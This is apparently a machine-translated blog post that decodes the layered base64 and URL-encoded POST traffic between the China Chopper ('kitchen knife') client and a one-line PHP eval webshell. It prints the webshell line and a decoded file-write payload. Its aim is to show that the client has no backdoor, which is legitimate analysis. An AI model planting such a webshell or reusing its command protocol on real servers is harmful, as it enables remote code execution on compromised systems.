Analysis on encryption of caetao Communication in China

Author: Tueur

Today, I saw someone on the Tusi saying that the kitchen knife has a backdoor. I just analyzed the one-sentence communication of the kitchen knife some time ago and used this to make an article ugly.

Note: The tool uses post to communicate with the server. The encryption methods in various languages are the same. Different codes are executed only. PHP is used as an example here.

In fact, the communication encryption of the kitchen knife is not very complicated. It only uses the base64_encode () function, but its encryption method is very clever.

Generally, even if the data sent to the server is encrypted, we can use the echo $ _ POST ['pass'] method to obtain the encrypted data,

So I added a code segment after the "one sentence" on the server during analysis, so that all the content of $ _ POST ['pass'] is saved to a txt text.

However, after performing some operations with a kitchen knife, we found that the txt text saved by the server had only one code: "@ eval (base64_decode ($ _ POST [z0]);".

This is one of its encryption methods:POST contains POSTIn this way, even if the administrator finds a Trojan, it cannot intercept any code you have executed.

There is almost no hope for the server to break through and only capture packets locally. The following code uses the packet capture tool to capture the POST data of the new file. (Pass is the name of the post variable in a sentence)

Pass = @ eval (base64_decode ($ _ POST [z0]); & z0 = commandid % 2BfCIpOztlY2hvIEB commandid % 3D & z1 = RDpcXFdXV1xcd3d3XFxOZXdGaWxlLnR4dA % 3D % 3D & z2 = dGVzdA % 3D % 3D

We can see that more than one POST variable is sent (the POST variable is separated by &), while the POST of a Trojan executes $ _ POST [z0], which is the second POST variable z0,

We can see that the z0 variable is encrypted by base64_encode (). Therefore, you must first decrypt the z0 variable and use the base64_decode () function to decrypt z0 to obtain the following information:

@ Ini_set ("display_errors", "0"); @ set_time_limit (0); @ set_magic_quotes_runtime (0 ); echo ("-6"} A = MQl = t} A = MQl packet t �� � □ �� �

Only the first three pieces of code are decrypted, and the code is garbled. I have not found the problem for one night. It seems that the encryption code should be correct,

The preceding pass variable shows that the code is directly decrypted using base64_decode () and executed using eval. If there are other encryption processes, no code can be executed.

The problem was found the next day. This is his second encryption method:When the server receives POST data, it automatically restores the string processed by url encoding.

Take a closer look at the encryption code in the z0 variable and you will find two % symbols. base64 encoding does not support the % symbol, and the % symbol is generally url encoding.

I restored % 2B and % 3D with the urldecode () function to "+" and "=", replaced them with the encryption code, and decrypted them with base64_decode () to get the complete code:

@ Ini_set ("display_errors", "0"); @ set_time_limit (0); @ set_magic_quotes_runtime (0); echo ("-> | ");; echo @ fwrite (fopen (base64_decode ($ _ POST ["z1"]), "w"), base64_decode ($ _ POST ["z2"])? "1": "0"; echo ("| <-"); die ();

The Code contains two POST variables: $ _ POST ['z1'] and $ _ POST ['z2']. This is the third-layer POST, it is also base64-encoded.

Find the two variables from the previously captured data packets, first restore the url encoding characters, and then use base64_decode () to decrypt them. The result is as follows:

Z1 = D: \ WWW \ www \ NewFile.txt // new file storage path z2 = test // New File Content

In this case, the code in $ _ POST ['pass'] is completely restored.

@ Ini_set ("display_errors", "0"); @ set_time_limit (0); @ set_magic_quotes_runtime (0); echo ("-> | ");; echo @ fwrite (fopen ("D: \ WWW \ www \ NewFile.txt", "w"), "test ")? "1": "0"; echo ("| <-"); die ();

Eval executes the above Code.

Other operations such as editing and copying are the same encryption method. I have restored all of them to plain text and have not found any so-called backdoors,

The kitchen knife client was also monitored for packet capture for more than two hours, and there was no automatic action.

From: constanding